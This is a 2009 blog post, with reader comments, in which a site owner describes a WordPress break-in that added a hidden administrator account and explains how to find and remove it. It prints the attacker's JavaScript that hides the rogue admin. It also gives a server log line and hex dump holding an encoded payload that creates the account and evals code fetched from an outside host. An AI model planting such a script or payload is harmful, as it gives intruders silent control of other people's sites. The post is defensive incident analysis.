WordPress Blog PermaLinks Hacked by “ElijahHastings65″!
This morning, I discovered that all of my permalinks (e.g. http://blog.nachotech.com/?p=119) were broken. When the permalinks were used, they would redirect to a URL that was partially correct, but had some extra code added to the end. Here’s what I would see on the end of the URLs:
/wordpress %&evalbase64_decode_SERVERHTTP_REFERER.+&%/
This seems harmless, but it breaks all the permalinks (which is the main way people visit my site, since that’s what Google shows.)
Your users will see an HTTP 400 BAD REQUEST error saying “Your browser sent a request that the server could not understand” like this:
I’ve done a lot of searching on the Internet for solutions, but haven’t found a good description of this particular hack yet, and no confirmation that this vulnerability is fixed in WordPress 2.8.4. However, here are the pertinent threads I have found:
http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/
http://wordpress.org/support/topic/307518?replies=16
http://wordpress.org/support/topic/297639
I have also found this page to be helpful, although it doesn’t describe this particular hack:
http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
As you can read in the above threads, the hacker (or the hacker’s bot-net) inserts a new Administrator user in your blog using SQL injection. If you look at your wp-admin’s Users page, you’ll see that the count of Administrator role users is one more than you had before. In my case, it showed “Administrator (2)” which indicates there are two administrator users. However, this new user added by the hacker has a clever First Name that includes some javascript to hide the user from the page. So I only saw 1 user in the list of Administrator users, not the 2 that are indicated.
HOW TO FIND AND DELETE THE HIDDEN ADMINISTRATOR
To find the hidden user, go to the /wp-admin/users.php page and click the link near the top of the page to view only Administrators. The page rendered in the browser will not show the hidden administrator, but you can “view source” of this page, and you’ll find the additional username somewhere in the HTML. Search for “tr id“. The key thing to find is the user id (e.g. “user-123″), which then can be used with the following URL, substituting the hacker’s user id (e.g. “123″) for NNN:
http://[your site URL here]/wp-admin/user-edit.php?user_id=NNN
Once you’re in the page to edit the user, you can change its role back to “Subscriber” and delete the bogus ‘first name’ field. (Also you’ll have to insert a bogus email address so that you can save your changes.) After saving the changes, return to the normal user list, and select this user and delete it.
NOTE: there are many more steps you’ll need to do in order to make sure your WordPress site is clean. Please consult My site was hacked FAQ for more instructions.
HOW THE HACKER HID THE NEW ADMINISTRATOR ACCOUNT
In my case, the hacker’s nickname in my WordPress user list was ElijahHastings65. Here is the clever “First Name” field that ended up hiding the hacker in the user list:
<input id="first_name" name="first_name" type="text" value="...
<div id="user_superuser"><script ^@^@^W@language="JavaScript">
var setUserName = function(){
try{
var t=document.getElementById("user_superuser");
while(t.nodeName!="TR"){
t=t.parentNode;
};
t.parentNode.removeChild(t);
var tags = document.getElementsByTagName("H3");
var s = " shown below";
for (var i = 0; i < tags.length; i++) {
var t=tags[i].innerHTML;
var h=tags[i];
if(t.indexOf(s)>0){
s =(parseInt(t)-1)+s;
h.removeChild(h.firstChild);
t = document.createTextNode(s);
h.appendChild(t);
}
}
var arr=document.getElementsByTagName("ul");
for(var i in arr) if(arr[i].className=="subsubsub"){
var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);
if(n[1]>0){
var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");
arr[i].innerHTML=txt;
}
}
}catch(e){};
};
addLoadEvent(setUserName);
</script></div>" />HOW TO FIND WHERE THE BOT ORIGINATED (MAYBE)
In my webserver’s log files I found more clues to when the attack occurred and from where it originated (IP Address 209.59.107.72):
209.59.107.72 - - [03/Sep/2009:19:49:29 -0700] “POST blog.nachotech.com/wp-login.php HTTP/1.1″ 302 5 “http://blog.nachotech.com/wp-login.php” “Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20060601 Firefox/2.0.0.10 (Ubunen-USgy)”
209.59.107.72 - - [03/Sep/2009:19:49:39 -0700] “POST blog.nachotech.com/wp-admin//options-permalink.php HTTP/1.1″ 200 10158 “http://blog.nachotech.com/wp-admin//options-permalink.php” “Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20060601 Firefox/2.0.0.10 (Ubunen-USgy)”
209.59.107.72 - - [03/Sep/2009:19:49:43 -0700] “POST blog.nachotech.com/xmlrpc.php HTTP/1.1″ 200 204 “JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdFbGlqYWhIYXN0aW5nczY1JzskdXNlcl9wYXNzPSdPcTJ4N0RRSClQUkAnO2V2YWwoZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saW5rcy53ZWJ3b3JkcHJlc3MuY24vZGF0YS9zaG9ydHBhcnQyLnR4dCcpKTtleGl0Ow==” “Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20060601 Firefox/2.0.0.10 (Ubunen-USgy)”
I suspect that it is this last line (the POST with the “JHJvbGU9J2FkbW…” contents) that is responsible for the PermaLink hack. However, I have no confirmation of this yet. If anyone has any more info, please email me at i...@nachotech.com or leave a comment below.
Here is a hex dump of this suspicious payload to help others who might be searching for clues:
0000000 4a 48 4a 76 62 47 55 39 4a 32 46 6b 62 57 6c 75
0000010 61 58 4e 30 63 6d 46 30 62 33 49 6e 4f 79 52 31
0000020 63 32 56 79 58 32 78 76 5a 32 6c 75 50 53 64 46
0000030 62 47 6c 71 59 57 68 49 59 58 4e 30 61 57 35 6e
0000040 63 7a 59 31 4a 7a 73 6b 64 58 4e 6c 63 6c 39 77
0000050 59 58 4e 7a 50 53 64 50 63 54 4a 34 4e 30 52 52
0000060 53 43 6c 51 55 6b 41 6e 4f 32 56 32 59 57 77 6f
0000070 5a 6d 6c 73 5a 56 39 6e 5a 58 52 66 59 32 39 75
0000080 64 47 56 75 64 48 4d 6f 4a 32 68 30 64 48 41 36
0000090 4c 79 39 73 61 57 35 72 63 79 35 33 5a 57 4a 33
00000a0 62 33 4a 6b 63 48 4a 6c 63 33 4d 75 59 32 34 76
00000b0 5a 47 46 30 59 53 39 7a 61 47 39 79 64 48 42 68
00000c0 63 6e 51 79 4c 6e 52 34 64 43 63 70 4b 54 74 6c
00000d0 65 47 6c 30 4f 77 3d 3d
HOW TO KEEP THIS HACK FROM HAPPENING
For now, I have simply renamed my xmlrpc.php file so that it is deactivated. I have read that the latest Wordpress version 2.8.4 does not have this vulnerability, but I haven’t had time to update yet (thanks to GoDaddy’s slow response time making hosting changes).
UPDATE 9/6/9: I have manually upgraded Wordpress to 2.8.4 (Wordpress says it is not vulnerable to this attack). So far, my PermaLinks are working.
September 7th, 2009 at 9:04 am
Thank you for posting this, my host doesn’t really let me see the logs, but you’ve provided me with what I was looking for. You were correct, the offending string was the JHJvbGU9J2FkbW… and it was base64 encoded. I decoded it via JavaScript and found that yes, it’s providing the user data to add to wordpress, then it’s executing a remote script which starts by calling the registration file of the blog it’s trying to hack. If I’m reading the code correctly, it looks like it’s trying to delete any administrator account over ID 25 that has the same first name of the admin being added, then it finishes creating the XML data for the new admin being injected and adds the user meta info (with the javascript that hides it in the users control panel), then it updates the option to not let any other users register.
And if you don’t believe me, I can tell you that your erroneous admin had the user name `ElijahHastings65`
September 7th, 2009 at 10:58 am
marion – thank you very much for the comment. I would appreciate seeing the decoded source of the hack – can you email it to me at i…@nachotech.com? I won’t post it on my blog – I am just interested in inspecting it.
Thanks,
Iggy
September 8th, 2009 at 11:16 pm
Hello,
I’m having trouble following your instructions for removing the hidden administrator. I upgraded WP to the latest version before I discovered the hidden administrator, who had changed my permalink structure (which I changed back). What “ID” am I looking for? I did find what I thought was an ID, then added it to the url that you provided, but all it did was bring up a website. And from there I’m lost. What page to edit? Am I editing this page in my hosting account or directly in wordpress?
Thanks for your help
September 9th, 2009 at 5:08 am
[...] thanks to the guys at NachoTech. The post there helped me sort out and fix my WP issues with a minimal loss of data. Share and [...]
September 9th, 2009 at 8:16 am
cavpres – thanks for your comment. I had an error in the URL due to my own upgrade of Wordpress. I’ve corrected that and also explained things a bit better. Please read the “How To Find And Delete” section again and let me know if it works for you now.
Thanks,
Iggy
September 9th, 2009 at 8:43 pm
Iggy,
Thanks, but I must be very dumb because I still cannot figure it out. Where do I put the URL, in my browser bar? Because when I do that it takes me to the login page for my blog. I saw two users in the view source code, 1 (which I think is me) and 5 (the bogus user) and I can also see a user name for this user as well. But I’m not being taken to any page to edit the info. Thanks again.
September 9th, 2009 at 11:05 pm
cavpres – As an example, if your blog is normally accessed as http://www.myblog.com/, abd the user id you want to edit is “5″, then you would put “http://www.myblog.com/wp-admin/user-edit.php?user_id=5″ into the browser’s Location/Address/URL field.
If that takes you to a login page, then go ahead and log in. You do need to be logged into your Wordpress blog as an Administrator to be able to edit the users. If you are not taken to an “Edit User” page eventually, then perhaps your Wordpress installation is non-standard. Are you hosting your blog at your own domain, or with Wordpress.com?
Also, what is the bogus user name? I am wondering if all the hacks were with the same username. Good luck!
September 11th, 2009 at 6:38 pm
This a$$**** has got me to! I’m new and my site is screwed up. My permalinks are messed up and I can’t log into wp admin. How do I do this through the cpanel? I’m scared that I will mess the site up worse. I look forward to hearing from you. Thank you for your time.
Jason
September 12th, 2009 at 10:42 am
Hi Jason – thanks for your comment. Sorry to hear your site was attacked too. In my case, I was still able to log into wp-admin, so I didn’t have to resort to other measures. My hosting provider (GoDaddy) uses myphpadmin, not cpanel, so I’m not familiar with cpanel. If you do have access to cpanel, however, you should be able to use it to either change the administrator password, or create a new administrator user, which should then allow you to use wp-admin. Here’s a couple links that might help you get started: Using cPanel and CPanel FAQ.
I would also suggest that you contact your hosting provider for assistance. They may be able to restore your Wordpress site and DB to a recent backup.
Good luck,
Iggy
September 14th, 2009 at 7:19 pm
[...] http://blog.nachotech.com/?p=125 [...]
September 27th, 2009 at 9:05 pm
Hi – thanks for taking the time to report on this! It looks as though the malicious script (or whatever it is) is a bit more seriously entrenched in the installation I am attempting to fix. When I try to view source my antivirus program gets all bent out of shape about threats. I also cannot download the user-edit.php file for the same reason (won’t allow me to do so for security reasons).
I WAS able to see the name of the evil admin (even though it vanishes from view very quickly) by first figuring out which page it was listed on (this site has many many subscribers, so I needed to dig through to find it), then I visited the page and took a screenshot right away. Sure enough, there was the bad admin username listed in the screenshot. I tried your approach with linking directly to that users edit page but it did not work.
You mentioned PhPMyAdmin – could I manually remove the user using that program or will I encounter the same issues?
Any assistance you can provide will be greatly appreciated!
Thanks
B
November 11th, 2009 at 3:40 pm
[...] With that Users page open in Firefox, I followed the advice given in this excellent Nachotech post: I went to the View tab at the top of the page and selected Page Source, which pops up all the [...]
January 16th, 2010 at 4:02 am
i had problems as well with accounting hiding when they hack ed web site, thank you for explaining us how to do it, especially i like you shoewd us codes in your article. Thank you.